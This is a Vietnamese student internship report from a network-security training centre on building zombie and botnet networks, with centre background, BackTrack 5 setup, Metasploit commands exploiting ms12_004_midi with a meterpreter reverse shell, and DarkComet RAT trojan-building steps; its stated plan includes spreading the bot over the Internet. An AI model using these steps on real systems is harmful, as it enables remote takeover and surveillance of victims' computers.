32
TRUNG TÂM ĐÀO TẠO QUẢN TRỊ MẠNG VÀ AN NINH MẠNG QUỐC TẾ ATHENA BÁO CÁO THỰC TẬP ĐỀ TÀI: Nghiên cứu và triển khai mạng lưới zombie , botnet trên hệ thống mạng GVHD : Võ Đỗ Thắng SVTT: Hồ Quốc Nghị

Báo cáo thực tập - Quốc Nghị

  • Upload
    blueabc

  • View
    182

  • Download
    2

Embed Size (px)

DESCRIPTION

bao cao thuc tap

Citation preview

Page 1: Báo cáo thực tập - Quốc Nghị

TRUNG TÂM ĐÀO TẠO QUẢN TRỊ MẠNG

VÀ AN NINH MẠNG QUỐC TẾ

ATHENA

BÁO CÁO THỰC TẬP

ĐỀ TÀI:

Nghiên cứu và triển khai mạng lưới

zombie , botnet trên hệ thống mạng

GVHD : Võ Đỗ Thắng

SVTT: Hồ Quốc Nghị

Page 2: Báo cáo thực tập - Quốc Nghị

Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập

2 Trang

LỜI CẢM ƠN

Trước hết em xin chân thành cảm ơn tất cả các thầy cô tại Trung Tâm Đào

Tạo Athena đã tận tình hướng dẫn em trong quá trình thực tập tại Trung Tâm Đào

Tạo Athena .Bên cạnh đó nhờ có sự giúp đỡ của thầy cô và các bạn cùng khóa, đến

nay em đã hoàn thành xong đề tài: “Nghiên cứu và triển khai mạng lưới zoombie ,

botnet trên hệ thống mạng”.

Để có được kết quả này, em xin chân thành cám ơn Thầy Võ Đỗ Thắng đã

quan tâm hướng dẫn cho em trong suốt quá trình hoàn thành đề tài này.

Vì thời gian có hạn cũng như kinh nghiệm còn thiếu nên đề tài của em không

tránh khỏi những thiếu sót. Em rất mong nhận được sự chỉ bảo, đóng góp ý kiến

của thầy để em có điều kiện bổ sung và có thể hoàn thành tốt đề tài của mình hơn.

Sinh viên thực tập

Hồ Quốc Nghị

Page 3: Báo cáo thực tập - Quốc Nghị

Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập

3 Trang

NHẬN XÉT TRUNG TÂM ATHENA

...................................................................................................................................

...................................................................................................................................

...................................................................................................................................

...................................................................................................................................

...................................................................................................................................

...................................................................................................................................

...................................................................................................................................

...................................................................................................................................

...................................................................................................................................

...................................................................................................................................

TP.HCM, ngày …. tháng …. năm 2014

Giáo viên hướng dẫn

Võ Đỗ Thắng

Page 4: Báo cáo thực tập - Quốc Nghị

Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập

4 Trang

MỤC LỤC

I. LỜI MỞ ĐẦU ....................................................................................... 6

1. Sự cần thiết của đề tài ........................................................................................... 6

2. Mục tiêu nghiên cứu .............................................................................................. 6

3. Phương pháp nghiên cứu ...................................................................................... 6

II. GIỚI THIỆU TỔNG QUAN VỀ TRUNG TÂM ĐÀO TẠO ATHENA ............. 7

1. Sơ lược trung tâm .................................................................................................. 7

2. Trụ sở và các chi nhánh và thông tin liên hệ .......................................................... 7

a. Trụ sở chính ............................................................................................................................ 7

b. Cơ sở tại HCM ......................................................................................................................... 8

c. Thông tin liên hệ ..................................................................................................................... 8

3. Quá trình hình thành và phát triển ........................................................................ 8

4. Cơ cấu tổ chức ....................................................................................................... 9

5. Các khóa học của trung tâm Athena .................................................................... 10

a. Các khóa học dài hạn ........................................................................................................... 10

b. Các khóa học ngắn hạn........................................................................................................ 10

c. Các sản phẩm khác .............................................................................................................. 11

d. Cơ sở hạ tầng ....................................................................................................................... 11

e. Các dịch vụ hỗ trợ................................................................................................................. 11

6. Khách hàng của Athena ....................................................................................... 11

7. Đối tác của Athena ............................................................................................... 12

8. Đội ngũ giảng viên của trung tâm đào tạo Athena ............................................... 12

III. GIỚI THIỆU VỀ BACKTRACK 5 .......................................................... 13

1. Giới thiệu ............................................................................................................. 13

2. Mục đích .............................................................................................................. 13

3. Cài đặt ................................................................................................................. 14

a. Cài đặt trong máy thật ........................................................................................................ 14

b. Cài đặt trong máy ảo ........................................................................................................... 14

IV. TRIỂN KHAI TRONG MÔI TRƯỜNG LAN ........................................... 21

1. Triển khai trong môi trường LAN ......................................................................... 21

2. Thử nghiệm xâm nhập bằng Metasploit .............................................................. 22

V. XÂY DỰNG BONET BẰNG DARKCOMET ........................................... 24

3. Giới thiệu DarkComet .......................................................................................... 24

Page 5: Báo cáo thực tập - Quốc Nghị

Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập

5 Trang

4. Cài đặt DarkComet ............................................................................................... 24

VI. HƯỚNG PHÁT TRIỂN ...................................................................... 31

VII. KẾT LUẬN ....................................................................................... 31

VIII. TÀI LIỆU THAM KHẢO .................................................................. 32

Page 6: Báo cáo thực tập - Quốc Nghị

Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập

6 Trang

I. LỜI MỞ ĐẦU 1. Sự cần thiết của đề tài

Trong các kiểu tấn công hệ thống trên internet, tấn công DDoS (Distributed Denial

of Service) là cách tấn công đơn giản, hiệu quả và khó phòng chống bậc nhất. DDoS là cách tấn công dựa vào việc gửi số lượng lớn yêu cầu (request) đến hệ thống nhằm chiếm dụng tài nguyên, làm cho hệ thống quá tải, không thể tiếp nhận và phục vụ các yêu cầu từ người dùng thực sự. Ví dụ điển hình là vào tháng 7 năm 2013, hàng loạt các trang báo điện tử của Việt Nam như Vietnamnet, Tuổi Trẻ Online, Dân Trí, Thanh niên Online bị tấn công dẫn đến không thể truy cập được trong nhiều tuần lễ liên tiếp. Theo thống kê từ Abort Network, đầu năm 2014 có hơn 100 vụ tấn công DDoS trên 100Gbps, 5733 vụ tấn công đạt 20Gbps gấp hơn hai lần năm 2013.

Để có thể tạo được số lượng yêu cầu đủ lớn để đánh sập hệ thống mục tiêu, các hacker thường gây dựng mạng lưới zombie, botnet với số lượng có thể lên đến

hàng triệu máy. Vì vậy, nghiên cứu về cách xây dựng mạng lưới zombie, botnet sẽ giúp chúng ta hiểu hơn về cách hoạt động, từ đó xây dựng các biện pháp phòng ngừa sự phát triển của hệ thống zombie, botnet.

2. Mục tiêu nghiên cứu Đề tài nghiên cứu trên hai môi trường:

Giai đoạn 1:

Trong môi trường mạng LAN, tìm ra được các lỗ hổng bảo mật trên các máy trong mạng, thử xâm nhập trên các máy.

Giai đoạn 2:

Trong môi trường Internet, dùng DarkComet để thử tạo, phát tán và điểu khiển mạng lưới botnet thông qua mạng Internet.

3. Phương pháp nghiên cứu Giai đoạn 1:

Sử dụng ảo hóa VMware để mô phỏng môi trường mạng LAN. Cài đặt Backtrack

trên một máy ảo VMware. Sau đó thực hiện thâm nhập từ máy Backtrack tới một mục tiêu.

Giai đoạn 2:

Cài đặt và tạo bot bằng DarkComet trên VPS (Virtual Private Server) và phát tán

trên mạng. Sau đó thực hiện xâm nhập, kiểm soát từ xa thông qua địa chỉ IP public của VPS.

Page 7: Báo cáo thực tập - Quốc Nghị

Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập

7 Trang

II. GIỚI THIỆU TỔNG QUAN VỀ TRUNG TÂM ĐÀO TẠO ATHENA 1. Sơ lược trung tâm

Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA_Tiền

thân là Công ty TNHH Tư vấn và Đào tạo quản trị mạng Việt Năng, (tên thương hiệu viết tắt là TRUNG TÂM ĐÀO TẠO ATHENA), được chính thức thành lập theo giấy phép kinh doanh số 4104006757 của Sở Kế Hoạch Đầu Tư Tp Hồ Chí Minh cấp ngày 04 tháng 11 năm 2008.

Tên công ty viết bằng tiếng nước ngoài: ATHENA ADVICE TRAINING NETWORK SECURITY COMPANY LIMITED.

ATHENA là một tổ chức quy tụ nhiều trí thức trẻ Việt Nam đầy năng động, nhiệt

huyết và kinh nghiệm trong lĩnh vực công nghệ thông tin. Với quyết tâm góp phần vào công cuộc thúc đẩy tiến trình tin học hóa của nước nhà. ATHENA đã và đang tập trung chủ yếu vào các họat động sau:

Đào tạo chuyên sâu quản trị mạng, an ninh mạng, thương mại điện tử theo các tiêu chuẩn quốc tế của các hãng nổi tiếng như Microsoft, Cisco, Oracle, Linux LPI, CEH,... Song song đó, trung tâm ATHENA còn có những chương trình đào tạo cao cấp dành riêng theo đơn đặt hàng của các đơn vị như Bộ Quốc Phòng, Bộ Công An , ngân hàng, doanh nghiệp, các cơ quan chính phủ, tổ chức tài chính..Qua đó cung cấp nguồn nhân lực trong lĩnh vực công nghệ thông tin, đặc biệt là chuyên gia về mạng máy tính và bảo mật mạng đạt trình độ quốc tế cho các tổ chức, doanh nghiệp có nhu cầu.

Tư vấn và hổ trợ cho doanh nghiệp ứng dụng hiệu quả tin học vào hoạt động sản

xuất kinh doanh.

Tiến hành các hoạt động nghiên cứu nâng cao kiến thức tin học và phát triển cơ sở dữ liệu thông tin về các ứng dụng và sự cố mạng.

Tiến hành các dịch vụ ứng cứu khẩn cấp cho doanh nghiệp trong trường hợp xảy

ra sự cố máy tính.

Sau gần 10 năm hoạt động,nhiều học viên tốt nghiệp trung tâm ATHENA đã là chuyên gia đảm nhận công tác quản lý hệ thống mạng, an ninh mạng cho nhiều bộ ngành như Cục Công Nghệ Thông Tin - Bộ Quốc Phòng , Bộ Công An, Sở Thông Tin Truyền Thông các tỉnh, bưu điện các tỉnh,…

Ngoài ra, Trung tâm ATHENA còn có nhiều chương trình hợp tác và trao đổi công

nghệ với nhiều đại học lớn như đại học Bách Khoa Thành Phố Hồ Chí Minh, Học Viện An Ninh Nhân Dân( Thủ Đức), Học Viện Bưu Chính Viễn Thông, Hiệp hội an toàn thông tin (VNISA), Viện Kỹ Thuật Quân Sự...

2. Trụ sở và các chi nhánh và thông tin liên hệ a. Trụ sở chính Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA.

Số 2 Bis Đinh Tiên Hoàng, Phường Đa Kao, Tp Hồ Chí Minh, Việt Nam.

Page 8: Báo cáo thực tập - Quốc Nghị

Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập

8 Trang

b. Cơ sở tại HCM Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA

92 Nguyễn Đình Chiểu ,Phường Đa Kao,Quận 1, Tp Hồ Chí Minh, Việt Nam

c. Thông tin liên hệ Điện thoại: ( 84-8 ) 3824 4041

Điện thoại: ( 84-8 ) 2210 3801

Hotline: 0943 23 00 99

Website: www.Athena.Edu.Vn

3. Quá trình hình thành và phát triển Một nhóm các thành viên là những doanh nhân tài năng và thành công trong lĩnh vực công nghệ thông tin đã nhận ra tiềm năng phát triển của việc đào tạo nền công nghệ thông tin nước nhà. Họ là những cá nhân có trình độ chuyên môn cao và có đầu óc lãnh đạo cùng với tầm nhìn xa về tương lai của ngành công nghệ thông tin trong tương lai, họ đã quy tụ được một lực lượng lớn đội ngũ công nghệ thông tin trước hết là làm nhiệm vụ ứng cứu máy tính cho các doanh nghiệp, cá nhân có nhu cầu. Bước phát triển tiếp theo là vươn tầm đào đạo đội ngũ cán bộ công nghệ thông tin cho đất nước và xã hội.

Các thành viên sáng lập trung tâm gồm:

- Ông Nguyễn Thế Đông: Cựu giám đốc trung tâm ứng cứu máy tính Athena,

hiện tại là giám đốc dự án của công ty Siemen Telecom.

- Ông Hứa Văn Thế Phúc: Phó Giám đốc Phát triển Thương mại Công ty EIS, Phó Tổng công ty FPT.

- Ông Nghiêm Sỹ Thắng: Phó Tổng giám đốc Ngân hàng Liên Việt, chịu trách nhiệm công nghệ thông tin của Ngân hàng.

- Ông Võ Đỗ Thắng: Hiện đang là giám đốc Trung tâm đào tạo quản trị và an ninh mạng Athena.

Đến năm 2003, bốn thành viên sáng lập cùng với với đội ngũ ứng cứu máy tính gần 100 thành viên hoạt động như là một nhóm, một tổ chức ứng cứu máy tính miền Nam.

Từ năm 2004- 2006: Trung tâm có nhiều bước phát triển và chuyển mình. Trung

tâm trở thành một trong những địa chỉ tin cậy của nhiều doanh nghiệp nhằm cài đặt hệ thống an ninh mạng và đào tạo cho đội ngũ nhân viên của các doanh nghiệp về các chương trình quản lý dự án MS Project 2003, kỹ năng thương mại điện tử, bảo mật web… và là địa chỉ tin cậy của nhiều học sinh_sinh viên đến đăng kí học. Đòi hỏi cấp thiết trong thời gian này của Trung tâm là nâng cao hơn nữa đội ngũ giảng viên cũng như cơ sở để đáp ứng nhu cầu ngày càng cao về công nghệ thông tin của đất nước nói chung, các doanh nghiệp, cá nhân nói riêng.Năm 2004, công ty mở rộng hoạt động cung cấp giải pháp, dịch vụ cho khu vực miền Trung thông qua việc thành lập văn phòng đại diện tại Đà Nẵng.

Page 9: Báo cáo thực tập - Quốc Nghị

Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập

9 Trang

Đến năm 2006: Trung tâm đào tạo quản trị và an ninh mạng Athena mở ra thêm một chi nhánh tại Cư xá Nguyễn Văn Trỗi. Đồng thời tiếp tục tuyển dụng đội ngũ giảng viên là những chuyên gia an ninh mạng tốt nghiệp các trường đại học và

học viện công nghệ thông tin uy tín trên toàn quốc, đồng thời trong thời gian này Athena có nhiều chính sách ưu đãi nhằm thu hút đội ngũ nhân lực công nghệ thông tin lành nghề từ các doanh nghiệp, tổ chức, làm giàu thêm đội ngũ giảng viên của trung tâm.

Đến năm 2008: Hàng loạt các trung tâm đào tạo quản trị và an ninh mạng mọc lên, cùng với khủng hoảng kinh tế tài chính toàn cầu đã làm cho Trung tâm rơi vào nhiều khó khăn. Ông Nguyễn Thế Đông cùng Ông Hứa Văn Thế Phúc rút vốn khỏi công ty gây nên sự hoang man cho toàn bộ hệ thống trung tâm. Cộng thêm chi nhánh tại Cư xã Nguyễn Văn Trỗi hoạt động không còn hiệu quả phải đóng cửa làm cho trung tâm rơi từ khó khăn này đến khó khăn khác. Lúc này, với quyết tâm khôi phục lại công ty cũng như tiếp tục sứ mạng góp phần vào tiến trình tin học hóa của đất nước. Ông Võ Đỗ Thắng mua lại cổ phần của hai nhà đầu tư lên làm giám đốc và xây dựng lại trung tâm. Đây là một bước chuyển mình có ý nghĩa chiến lược của trung tâm. Mở ra một làn gió mới và một giai đoạn mới, cùng với

quyết tâm mạnh mẽ và một tinh thần thép đã giúp ông Thắng vượt qua nhiều khó khăn ban đầu, giúp trung tâm đứng vững trong thời kì khủng hoảng.

Từ năm 2009 – nay: Cùng với sự lãnh đạo tài tình và đầu óc chiến lược. Trung tâm đào tạo quản trị và an ninh mạng dần được phục hồi và trở lại quỹ đạo hoạt động của mình. Đến nay, Trung tâm đã trở thành một trong những trung tâm đào tạo quản trị mạng hàng đầu Việt Nam. Cùng với sự liên kết của rất nhiều công ty, tổ chức doanh nghiệp, trung tâm trở thành nơi đào tạo và cung cấp nguồn nhân lực công nghệ thông tin cho xã hội. Từng bước thực hiện mục tiêu góp phần vào tiến trình tin học hóa nước nhà.

4. Cơ cấu tổ chức

Page 10: Báo cáo thực tập - Quốc Nghị

Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập

10 Trang

5. Các khóa học của trung tâm Athena a. Các khóa học dài hạn - Chương trình đào tạo chuyên gia an ninh mạng. ( AN2S) Athena network

security specialist.

- Chương trình Quản trị viên an ninh mạng (ANST) Athena netuwork security Technician

- Chương trình đào tạo chuyên gia an ninh mạng. ( AN2S) Athena network security specialist.

- Chương trình Quản trị viên an ninh mạng (ANST) Athena netuwork security

Technician.

- Chuyên viên quản trị mạng nâng cao (ANMA) Athena network manager Administrator

b. Các khóa học ngắn hạn - Quản trị mạng Microsoft căn bản ACBN .

- Phần cứng máy tính, laptop, server .

- Quản trị hệ thống mạng Microsoft MCSA Security.

- Quản trị mạng Microsoft nâng cao MCSE.

- Quản trị window Vista

- Quản trị hệ thống Window Server 2008, 2012.

- Lớp Master Exchange Mail Server.

Page 11: Báo cáo thực tập - Quốc Nghị

Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập

11 Trang

- Quản trị mạng quốc tế Cissco CCNA.

- Quản trị hệ thống mạng Linux 1 và Linux 2.

- Khóa thiết kế web và bảo mật mạng

- Xây dựng, quản trị web thương mại điện tử với Joomla và VirtuMart.

- Lập trình web với Php và MySQL.

- Bảo mật mạng quốc tế ACNS.

- Hacker mũ trắng .

- Athena Mastering Firewall Security.

- Bảo mật website.

c. Các sản phẩm khác - Chuyên đề thực hành sao lưu và phục hồi dữ liệu.

- Chuyên đề thực hành bảo mật mạng Wi_Fi.

- Chuyên đề Ghost qua mạng.

- Chuyên đề xây dựng và quản trị diễn đàn.

- Chuyên đề bảo mật dữ liệu phòng chống nội gián.

- Chuyên đề quản lý tài sản công nghệ thông tin .

- Chuyên đề kỹ năng thương mại điện tử.

d. Cơ sở hạ tầng - Thiết bị đầy đủ và hiện đại.

- Chương trình cập nhật liên tục, bảo đảm học viên luôn tiếp cận với những

công nghệ mới nhất.

- Phòng máy rộng rãi, thoáng mát.

e. Các dịch vụ hỗ trợ

- Đảm bảo việc làm cho học viên tốt nghiệp khoá dài hạn.

- Giới thiệu việc làm cho mọi học viên.

- Thực tập có lương cho học viên khá giỏi.

- Ngoài giờ học chính thức, học viên được thực hành thêm miễn phí, không giới hạn thời gian.

- Hỗ trợ kỹ thuật không thời hạn trong tất cả các lĩnh vực liên quan đến máy

tính, mạng máy tính, bảo mật mạng.

- Hỗ trợ thi Chứng chỉ Quốc tế.

6. Khách hàng của Athena Mọi đối tượng chuyên hoặc không chuyên về CNTT.

Khách hàng chủ yếu của ATHENA là các bạn học sinh, sinh viên và các cán bộ

công nhân viên chức yêu thích lĩnh vực công nghệ thông tin.

Page 12: Báo cáo thực tập - Quốc Nghị

Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập

12 Trang

7. Đối tác của Athena Trung tâm đào tạo an ninh mạng ATHENA là đối tác đào tạo & cung cấp nhân sự

CNTT, quản trị mạng , an ninh mạng chất lượng cao theo đơn đặt hàng cho các đơn vị như ngân hàng, doanh nghiệp, các cơ quan chính phủ, tổ chức tài chính…

8. Đội ngũ giảng viên của trung tâm đào tạo Athena Tất cả các giảng viên trung tâm ATHENA có đều tốt nghiệp từ các trường đại học hàng đầu trong nước .... Tất cả giảng viên ATHENA đều phải có các chứng chỉ quốc tế như MCSA, MCSE, CCNA, CCNP, Security+, CEH,có bằng sư phạm Quốc tế (Microsoft Certified Trainer).Đây là các chứng chỉ chuyên môn bắt buộc để đủ điều kiện tham gia giảng dạy tại trung tâm ATHENA.

Bên cạnh đó,Các giảng viên ATHENA thường đi tu nghiệp và cập nhật kiến thức

công nghệ mới từ các nước tiên tiến như Mỹ , Pháp, Hà Lan, Singapore,... và truyền đạt các công nghệ mới này trong các chương trình đào tạo tại trung tâm ATHENA.

Page 13: Báo cáo thực tập - Quốc Nghị

Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập

13 Trang

III. GIỚI THIỆU VỀ BACKTRACK 5 1. Giới thiệu

Backtrack là bản phân phối dựa trên GNU/LINUX Debian nhắm mục đích pháp y

kỹ thuật số và sử dụng thử nghiệm thâm nhập.Việc phân phối Backtrack có nguồn gốc từ sự hợp nhất của hai phân phối trước đây là cạnh tranh mà tập trung vào thử nghiệm thâm nhập: WHAX và Auditor Security Collection

2. Mục đích Backtrack 5 có các công cụ được sử dụng cho quá trình thử nghiệm xâm nhập. Các công cụ kiểm tra xâm nhập trong backtrack 5 có thể được phân loại như sau:

Information gathering: loại này có chứa một số công cụ có thể được sử dụng để có được thông tin liên quan đến mục tiêu DNS,định tuyến, địa chỉ email,trang web,máy chủ mail…Thông tin này được thu thập từ các thông tin có sẵn trên internet,mà không cần chạm vào môi trường mục tiêu.

Network mapping: loại này chứa một số công cụ có thể được sử dụng để có kiểm

tra các host đang tôn tại,thông tin về OS,ứng dụng được sử dụng bởi mục tiêu,và cũng làm portscanning.

Vulnerability identification: Trong thể loại này, chúng ta có thể tìm thấy các công cụ để quét các lỗ hổng (tổng hợp) và trong các thiết bị Cisco. Nó cũng chứa các công cụ để thực hiện và phân tích Server Message Block (SMB) và Simple Network Management Protocol (SNMP).

Web application analysis: loại này chứa các công cụ có thể được sử dụng trong

theo dõi, giám sát các ứng dụng web.

Radio network analysis: Để kiểm tra mạng không dây, bluetooth và nhận dạng tần số vô tuyến (RFID).

Penetration: loại này chứa các công cụ có thể được sử dụng để khai thác các lỗ

hổng tìm thấy trong các máy tính mục tiêu.

Privilege escalation: Sau khi khai thác các lỗ hổng và được truy cập vào các máy tính mục tiêu, chúng ta có thể sử dụng các công cụ trong loại này để nâng cao đặc quyền của chúng ta cho các đặc quyền cao nhất.

Maintaining access: Công cụ trong loại này sẽ có thể giúp chúng ta trong việc duy

trì quyền truy cập vào các máy tính mục tiêu. Chúng ta có thể cần để có được những đặc quyền cao nhất trước khi các chúng ta có thể cài đặt công cụ để duy trì quyền truy cập.

Voice Over IP (VOIP): Để phân tích VOIP chúng ta có thể sử dụng các công cụ trong thể loại này.

Page 14: Báo cáo thực tập - Quốc Nghị

Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập

14 Trang

Digital forensics: Trong loại này, chúng ta có thể tìm thấy một số công cụ có thể được sử dụng để làm phân tích kỹ thuật như có được hình ảnh đĩa cứng, cấu trúc các tập tin, và phân tích hình ảnh đĩa cứng. Để sử dụng các công cụ cung cấp trong thể loại này, chúng ta có thể chọn Start Backtrack Forensics trong trình đơn khởi động. Đôi khi sẽ đòi hỏi chúng ta phải gắn kết nội bộ đĩa cứng và các tập tin trao đổi trong chế độ chỉ đọc để bảo tồn tính toàn vẹn.

Reverse engineering: Thể loại này chứa các công cụ có thể được sử dụng để gỡ

rối chương trình một hoặc tháo rời một tập tin thực thi.

3. Cài đặt Chúng ta có thể tải bản Backtrack 5 tại địa chỉ: www.backtrack-

linux.org/downloads/, có bản cho Vmware và file ISO.

a. Cài đặt trong máy thật Chúng ta cần chuẩn bị một phân vùng để cài đặt Backtrack. Sau đó chạy Backtrack

Live DVD. Khi gặp màn hình login, ta sử dụng username là root, pass là toor. Sau đó để vào chế độ đồ họa, ta gõ startx và ta sẽ vào chế độ đồ họa của Backtrack 5.

Để cài đặt Backtrack 5 đến đĩa cứng ta chọn tập tin có tên install.sh trên desktop và tiến hành cài đặt. Tuy nhiên, nếu không thể tìm thấy tập tin, chúng ta có thể sử dụng ubiquity để cài đặt. Để sử dụng ubiquity, ta mở Terminal gõ ubiquity. Sau đó cửa sổ cài đặt sẽ hiển thị. Sau đó trả lời 1 số câu hỏi như thành phố chúng ta đang sống, keyboard layout, phân vùng ổ đĩa cài đặt,… Sau đó tiến hành cài đặt

b. Cài đặt trong máy ảo Điểm thuận lợi là ta không cần chuẩn bị một phân vùng cho Backtrack, và sử dụng đồng thời một OS khác. Khuyết điểm là tốc độ chậm, không dùng được wireless trừ USB wireless.

Ta có thể có thể sử dụng file VMWare được cung cấp bởi BackTrack. Từ đây chúng ta có BackTrack trên máy ảo thật dễ dàng và nhanh chóng. Cấu hình trong file VMWare là memory 768MB, hardisk :30GB, Network:NAT. Để sử dụng được card mạng thật, ta phải chọn Netword là Briged

Dưới đây làm một số hình ảnh khi cài BackTrack trên máy ảo VMWare:

Vmware Workstation 9

Page 15: Báo cáo thực tập - Quốc Nghị

Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập

15 Trang

Tạo một máy ảo mới và cho đĩa BackTrack vào

Giao diện khởi động của BackTrack

Page 16: Báo cáo thực tập - Quốc Nghị

Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập

16 Trang

Gõ startx để vào chế độ đồ họa trong BackTrack

Để cài đặt, click chọn vào file Install BackTrack trên màn hình Desktop

Page 17: Báo cáo thực tập - Quốc Nghị

Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập

17 Trang

Chọn ngôn ngữ, chọn Tiếp để tiếp tục

Chọn múi giờ, chọn Tiếp để tiếp tục

Page 18: Báo cáo thực tập - Quốc Nghị

Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập

18 Trang

Chọn ngôn ngữ bàn phím, chọn Tiếp để tiếp tục

Chọn phân vùng để cài, chọn Tiếp để tiếp tục

Page 19: Báo cáo thực tập - Quốc Nghị

Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập

19 Trang

Nhấn Cài đặt để bắt đầu cài

Quá trình cài đã bắt đầu.

Page 20: Báo cáo thực tập - Quốc Nghị

Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập

20 Trang

Sau khi hoàn tất, chỉ việc khởi động lại là xong.

Page 21: Báo cáo thực tập - Quốc Nghị

Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập

21 Trang

IV. TRIỂN KHAI TRONG MÔI TRƯỜNG LAN 1. Triển khai trong môi trường LAN

VMware Workstation chuẩn bị sẵn cho chúng ta 10 Switch ảo. Trong số đó,

VMnet0, VMnet1 và VMnet8 được dùng để kết nối với một vài thiết bị đặc biệt khác như Virtual Bridge, Virtual NAT Device, DHCP Server. Trong khuôn khổ bài này, ta sẽ sử dụng VMnet0 để thiết lập mạng cho các máy ảo trong VMware.

VMnet0 là một Switch ảo được kết nối với Bridge ảo để liên lạc ra ngoài mạng thật. Các máy tính ảo nếu được cấu hình card mạng kết nối vào VMnet0 thì có thể tham gia vào việc liên lạc, chia sẻ dữ liệu với các máy thật ở mạng ngoài. Nếu mạng ngoài chúng ta có kết nối với Router ADSL, có cấu hình cấp IP động trên Router thì các máy ảo sẽ nhận được IP từ Router như một máy tính thật. Mặc định, VMWare sẽ tự chọn card mạng trên máy thật mà có kết nối ra mạng ngoài. Tuy nhiên nếu máy các bạn có nhiều hơn 2 card mạng thật thì chúng ta có thể lựa chọn lại cho phù hợp bằng cách điều chỉnh trong Virtual Network Editor > tab Host Virtual Network Mapping> VMnet0.

Để chỉ định máy ảo sử dụng Bridge ảo VMnet0, trong giao diện VMware, kích chuột phải vào tên máy ảo, chọn Setting…, trong tab Hardware, chọn mục Network Adapter, sau đó trong mục Network Connection, chọn tùy chọn Bridged.

Làm tương tự với các máy ảo khác.

Như vậy, sau khi cấu hình xong, các máy ảo được cấp địa chỉ IP như máy thật. Và do đó, các máy ảo thuộc về cùng một mạng LAN, và chung mạng LAN với cả máy thật đang chạy VMware.

Page 22: Báo cáo thực tập - Quốc Nghị

Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập

22 Trang

Mô hình mạng LAN được mô phỏng:

2. Thử nghiệm xâm nhập bằng Metasploit Trong Backtrack, chúng ta sử dụng công cụ Metasploit để thực hiện xâm nhập. Công cụ này có database rất lớn, về các lỗi tồn tại trên các hệ điều hành và cách tấn công.

Để khởi động giao diện Console của Metasploit, trong Terminal, gõ msfconsole.

Giao diện chương trình:

Khi dấu nhắc trở thành msf> , chúng ta có thể sử dụng chương trình.

Để sử dụng một module nào đó, chúng ta sử dụng cú pháp:

use <Đường dẫn đến module>

VD: khai thác lỗi ms12_004

use exploit/windows/browser/ms12_004_midi -> Enter

Các thiết lập:

set PAYLOAD windows/meterpreter/reverse_tcp

set SRVHOST 192.168.0.126

set LHOST 192.168.0.126

exploit

Switch

PC1 PC2 PC3

Page 23: Báo cáo thực tập - Quốc Nghị

Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập

23 Trang

Sau khi exploit, Metasploit sẽ tạo một link chứa mã độc (http://192.168.0.126:8080/OXRIFK6vPY), chỉ cần nạn nhân click vào link thì mã độc sẽ được gửi sang máy nạn nhân và sau đó có thể chiếm quyền máy.

Page 24: Báo cáo thực tập - Quốc Nghị

Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập

24 Trang

V. XÂY DỰNG BONET BẰNG DARKCOMET 3. Giới thiệu DarkComet

DarkComet là một công cụ quản trị từ xa (Remote Administrator Tool) miễn phí rất

nổi tiếng, được tạo ra để điều khiển bất kì máy Microsoft Windows nào. DarkComet có khả năng điều khiển truy cập từ xa, quả lí tập tin, giám sát (keyloger, chụp ảnh màn hình, xem webcame,..), các chức năng mạng,..

Dự án DarkComet RAT đã phát hành bản chính thức cuối cùng là DarkComet RAT v5.4.1 Legacy vào ngày 1/10/2012.

4. Cài đặt DarkComet Dự án DarkComet RAT đã chính thức đóng vào tháng 6 năm 2012, các bản chính thức trên trang http://www.darkcomet-rat.com đã được gỡ xuống. Bản DarkComet dùng trong phần này là bản DarkComet Rat 5.3.1, được download từ http://www.mediafire.com/download/37bd1c0acbd2p6c/darkcomet+5.3.1.rar.

Chạy DarkComet trên linux:

Tải bản DarkComet về, giải nén vào thư mục darkcomet5.3.1RAT. Mở terminal, chuyển thư mục làm việc hiện hành về darkcomet5.3.1RAT. Dùng lệnh wine darkcomet để khởi động DarkComet:

wine darkcomet

Giao diện quản lí của DarkComet:

Page 25: Báo cáo thực tập - Quốc Nghị

Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập

25 Trang

Tạo cổng lắng nghe các kết nối từ nạn nhân: Vào DarkComet-RAT -> Listen to new port(+Listen)

Điền cổng kết nối, cổng mặc định là 1604. Chọn Listen để xác nhận

Ta có thể thêm cổng lắng nghe khác nếu muốn.

Tạo trojan:

Trojan có thể được tạo từ bất kì máy windows nào. Các bước tạo trojan:

Download DarkComet

Giải nén file DarkComet531RAT.zip vào thư mục DarkComet.

Vào thư mục DarkComet, chạy file DarkComet.exe

Vào DarkComet -> Server module:

Chọn Minimalist nếu muốn dùng các tùy chọn mặc định

Chọn Full Editor nếu muốn tùy chỉnh tất cả tùy chọn.

Page 26: Báo cáo thực tập - Quốc Nghị

